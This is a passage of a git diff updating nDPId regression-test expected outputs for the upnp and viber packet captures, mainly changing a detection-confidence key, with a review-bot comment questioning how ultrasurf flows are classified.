flows.............: 0 +~~ total layer4 data length..: 7487719 bytes +~~ total detected protocols..: 3 +~~ total active/idle flows...: 3/3 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6250134 bytes +~~ total memory freed........: 6250134 bytes +~~ total allocations/frees...: 129034/129034 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 465 chars +~~ json string max len.......: 3973 chars +~~ json string avg len.......: 2218 chars diff --git a/test/results/upnp.pcap.out b/test/results/upnp.pcap.out index 301380637..4faa6de5a 100644 --- a/test/results/upnp.pcap.out +++ b/test/results/upnp.pcap.out 
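Review bot: The new expected output for ultrasurf.pcap pins flows 2 and 3 as `"proto":"TLS","breed":"Safe","category":"Web"` in their `detected`, `detection-update` and `end` events, although both connect to 65.49.68.25:50053, the same endpoint whose flow 1 is classified as `"proto":"UltraSurf","category":"VPN"`. If that is what the bumped libnDPI is meant to produce (flow 1 is the only one with `"midstream":1`, which may be what the UltraSurf match depends on), it deserves a line in the commit description, because the regression test will from now on treat the TLS label as correct and a consumer filtering on `proto` or `category` would see only one of the three flows. The two flow risks recorded on those flows, `Known Proto on Non Std Port` and `Missing SNI TLS Extn`, are then the only signal left for them. Separately, the first `detected` event of each TLS flow reports `"cipher":"TLS_NULL_WITH_NULL_NULL"` with an empty `ja3s`, which looks like an unset value serialized before the server's reply was parsed rather than a negotiated cipher.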
@@ -2,16 +2,16 @@ 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"upnp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1541515314826} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"upnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1541515314826,"flow_last_seen":1541515314826,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1541515314826,"l3_proto":"ip6","src_ip":"fe80::3441:3d24:6d30:a807","dst_ip":"ff02::c","src_port":58932,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01338{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"upnp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1541515314826,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":718,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":718,"pkt_l4_len":664,"thread_ts_msec":1541515314826,"pkt":"MzMAAAAMGNvyL6AYht1gDeGUApgRAf6AAAAAAAAANEE9JG0wqAf\/AgAAAAAAAAAAAAAAAAAM5jQOdgKYg108P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI\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"} 
-00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"upnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1541515314826,"flow_last_seen":1541515314826,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1541515314826,"l3_proto":"ip6","src_ip":"fe80::3441:3d24:6d30:a807","dst_ip":"ff02::c","src_port":58932,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"upnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1541515314826,"flow_last_seen":1541515314826,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1541515314826,"l3_proto":"ip6","src_ip":"fe80::3441:3d24:6d30:a807","dst_ip":"ff02::c","src_port":58932,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"upnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1541515314827,"flow_last_seen":1541515314827,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1541515314827,"l3_proto":"ip4","src_ip":"192.168.61.66","dst_ip":"239.255.255.250","src_port":58931,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"upnp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1541515314827,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":698,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":698,"pkt_l4_len":664,"thread_ts_msec":1541515314827,"pkt":"AQBef\/\/6GNvyL6AYCABFAAKsCtYAAAERvobAqD1C7\/\/\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"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"upnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1541515314827,"flow_last_seen":1541515314827,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1541515314827,"l3_proto":"ip4","src_ip":"192.168.61.66","dst_ip":"239.255.255.250","src_port":58931,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"upnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1541515314827,"flow_last_seen":1541515314827,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1541515314827,"l3_proto":"ip4","src_ip":"192.168.61.66","dst_ip":"239.255.255.250","src_port":58931,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 
01338{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"upnp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1541515314944,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":718,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":718,"pkt_l4_len":664,"thread_ts_msec":1541515314944,"pkt":"MzMAAAAMGNvyL6AYht1gDeGUApgRAf6AAAAAAAAANEE9JG0wqAf\/AgAAAAAAAAAAAAAAAAAM5jQOdgKYg108P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI\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"} 01312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"upnp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1541515315006,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":698,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":698,"pkt_l4_len":664,"thread_ts_msec":1541515315006,"pkt":"AQBef\/\/6GNvyL6AYCABFAAKsCtcAAAERvoXAqD1C7\/\/\/+uYzDnYCmBmmPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48c29hcDpFbnZlbG9wZSB4bWxuczpzb2FwPSJodHRwOi8vd3d3LnczLm9yZy8yMDAzLzA1L3NvYXAtZW52ZWxvcGUiIHhtbG5zOndzYT0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNC8wOC9hZGRyZXNzaW5nIiB4bWxuczp3c2Q9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDUvMDQvZGlzY292ZXJ5Ij48c29hcDpIZWFkZXI+PHdzYTpUbz51cm46c2NoZW1hcy14bWxzb2FwLW9yZzp3czoyMDA1OjA0OmRpc2NvdmVyeTwvd3NhOlRvPjx3c2E6QWN0aW9uPmh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDUvMDQvZGlzY292ZXJ5L1Jlc29sdmU8L3dzYTpBY3Rpb24+PHdzYTpNZXNzYWdlSUQ+dXJuOnV1aWQ6M2Y0MmRjOWEtMjRjZS00OGQxLTg4ZjktMTZiOTZhMTM3ZDcxPC93c2E6TWVzc2FnZUlEPjwvc29hcDpIZWFkZXI+PHNvYXA6Qm9keT48d3NkOlJlc29sdmU+PHdzYTpFbmRwb2ludFJlZmVyZW5jZT48d3NhOkFkZHJlc3M+dXJuOnV1aWQ6ZTMyNDgwMDAtODBjZS0xMWRiLTgwMDAtMDAxYmE5OWVjOTU2PC93c2E6QWRkcmVzcz48L3dzYTpFbmRwb2ludFJlZmVyZW5jZT48L3dzZDpSZXNvbHZlPjwvc29hcDpCb2R5Pjwvc29hcDpFbnZlbG9wZT4="} 
01338{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"upnp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1541515315178,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":718,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":718,"pkt_l4_len":664,"thread_ts_msec":1541515315178,"pkt":"MzMAAAAMGNvyL6AYht1gDeGUApgRAf6AAAAAAAAANEE9JG0wqAf\/AgAAAAAAAAAAAAAAAAAM5jQOdgKYg108P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI\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"} 01312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"upnp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1541515315356,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":698,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":698,"pkt_l4_len":664,"thread_ts_msec":1541515315356,"pkt":"AQBef\/\/6GNvyL6AYCABFAAKsCtgAAAERvoTAqD1C7\/\/\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"} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":14,"source":"upnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1541515314826,"flow_last_seen":1541515320458,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":4592,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1541515321472,"l3_proto":"ip6","src_ip":"fe80::3441:3d24:6d30:a807","dst_ip":"ff02::c","src_port":58932,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 
-00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":14,"source":"upnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1541515314827,"flow_last_seen":1541515321472,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":4592,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1541515321472,"l3_proto":"ip4","src_ip":"192.168.61.66","dst_ip":"239.255.255.250","src_port":58931,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":14,"source":"upnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1541515314826,"flow_last_seen":1541515320458,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":4592,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1541515321472,"l3_proto":"ip6","src_ip":"fe80::3441:3d24:6d30:a807","dst_ip":"ff02::c","src_port":58932,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":14,"source":"upnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1541515314827,"flow_last_seen":1541515321472,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":4592,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1541515321472,"l3_proto":"ip4","src_ip":"192.168.61.66","dst_ip":"239.255.255.250","src_port":58931,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":14,"source":"upnp.pcap","alias":"nDPId-test","packets-captured":14,"packets-processed":14,"total-skipped-flows":0,"total-l4-payload-len":9184,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1541515321472} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 14/14 @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870853 bytes -~~ total memory freed........: 5870853 bytes -~~ total allocations/frees...: 118130/118130 +~~ total memory allocated....: 6004487 bytes +~~ total memory freed........: 6004487 bytes +~~ total allocations/frees...: 120892/120892 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 1343 chars diff --git a/test/results/viber.pcap.out b/test/results/viber.pcap.out index 854a271ba..b03f5487d 100644 --- a/test/results/viber.pcap.out +++ b/test/results/viber.pcap.out 
@@ -4,90 +4,92 @@ 00603{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1527155638428,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1527155638428,"pkt":"AA6OMNv9MAdNo1+nCABFAACZvbBAAEAGio\/AqAARNAD9ZYG4EJTYH5QATQ0UaIAYAtokAwAAAQEICgAhYEL3kz3SZQAKAAAALtCh9tIA1PL3FQOheV4He+mBM0W\/i9pTb10sHI+OMXtBs1b9JHGGgzJlSCkVK80QeHWJMpbzU2NcxAJaXXoLguc1CK5osKkCx6zZTIH0SZ0piWwLO+YlPXpdR9T6nHw="} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155638474,"flow_last_seen":1527155638474,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155638474,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1527155638474,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1527155638474,"pkt":"AA6OMNv9MAdNo1+nCABFAABAHQZAAEARnDbAqAARwKgAD7KvADUALIZ64YMBAAABAAAAAAAABWdyYXBoCGZhY2Vib29rA2NvbQAAAQAB"} 
-00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155638474,"flow_last_seen":1527155638474,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155638474,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155638474,"flow_last_seen":1527155638474,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155638474,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00650{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1527155638476,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1527155638476,"pkt":"MAdNo1+nAA6OMNv9CABFAAC9W3xAAEARXUPAqAAPwKgAEQA1sq8AqYax4YOBgAABAAMAAgACBWdyYXBoCGZhY2Vib29rA2NvbQAAAQABwAwABQABAAAK\/QAGA2FwacASwDAABQABAAADcAAMBHN0YXIEYzEwcsASwEIAAQABAAAAIgAEHw1WCMBHAAIAAQAAChUABwFiAm5zwEfARwACAAEAAAoVAAQBYcBswH0AAQABAAAKFQAERavvC8BqAAEAAQAAChUABEWr\/ws="} -00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155638474,"flow_last_seen":1527155638476,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1527155638476,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":1,"num_answers":7,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.86.8"}} 
+00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155638474,"flow_last_seen":1527155638476,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1527155638476,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":1,"num_answers":7,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.86.8"}} 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1527155638483,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1527155638483,"pkt":"AA6OMNv9MAdNo1+nCABFAABsvbFAAEAGirvAqAARNAD9ZYG4EJTYH5RlTQ0UaIAYAtrUUgAAAQEICgAhYFH3kz3SOAALAAAAldaoLlKjmwog1MjwGSIlPYr6Sdpf8civ07lgAXs3mNLP4I1IauuXnWuqSM\/O114Rmek="} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1527155638524,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155638524,"pkt":"MAdNo1+nAA6OMNv9CABFAAA0M+hAACYGLr00AP1lwKgAERCUgbhNDRRo2B+UZYAQAIxrZwAAAQEICveUYGsAIWBC"} 
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639005,"flow_last_seen":1527155639005,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1527155639005,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1527155639005,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155639005,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8HWBAAEARm+DAqAARwKgAD4nTADUAKI8By5wBAAABAAAAAAAAA2FwcAZhZGp1c3QDY29tAAABAAE="} -00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639005,"flow_last_seen":1527155639005,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1527155639005,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Advertisement"},"dns": {"query":"app.adjust.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639005,"flow_last_seen":1527155639005,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1527155639005,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Advertisement"},"dns": {"query":"app.adjust.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00781{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1527155639008,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"thread_ts_msec":1527155639008,"pkt":"MAdNo1+nAA6OMNv9CABFAAEhW4BAAEARXNvAqAAPwKgAEQA1idMBDcumy5yBgAABAAQABAAEA2FwcAZhZGp1c3QDY29tAAABAAHADAABAAEAAAHMAASyots6wAwAAQABAAABzAAEsqLbmcAMAAEAAQAAAcwABLKi2LPADAABAAEAAAHMAAS5l8wIwBAAAgABAAKIXQATBG5zMDEGYWRqdXN0BXdvcmtzAMAQAAIAAQACiF0AFARkbnMxA3AwOQVuc29uZQNuZXQAwBAAAgABAAKIXQAHBGRuczLAkMAQAAIAAQACiF0ABwRuczAywHHAiwABAAEAAWUPAATGMywJwKsAAQABAAFlDwAExjMtCcBsAAEAAQAAMG8ABC02EQHAvgABAAEAADBvAAQtNhFB"} 
-00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155639005,"flow_last_seen":1527155639008,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":261,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1527155639008,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Advertisement"},"dns": {"query":"app.adjust.com","num_queries":1,"num_answers":12,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"178.162.219.58"}} +00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155639005,"flow_last_seen":1527155639008,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":261,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1527155639008,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Advertisement"},"dns": {"query":"app.adjust.com","num_queries":1,"num_answers":12,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"178.162.219.58"}} 
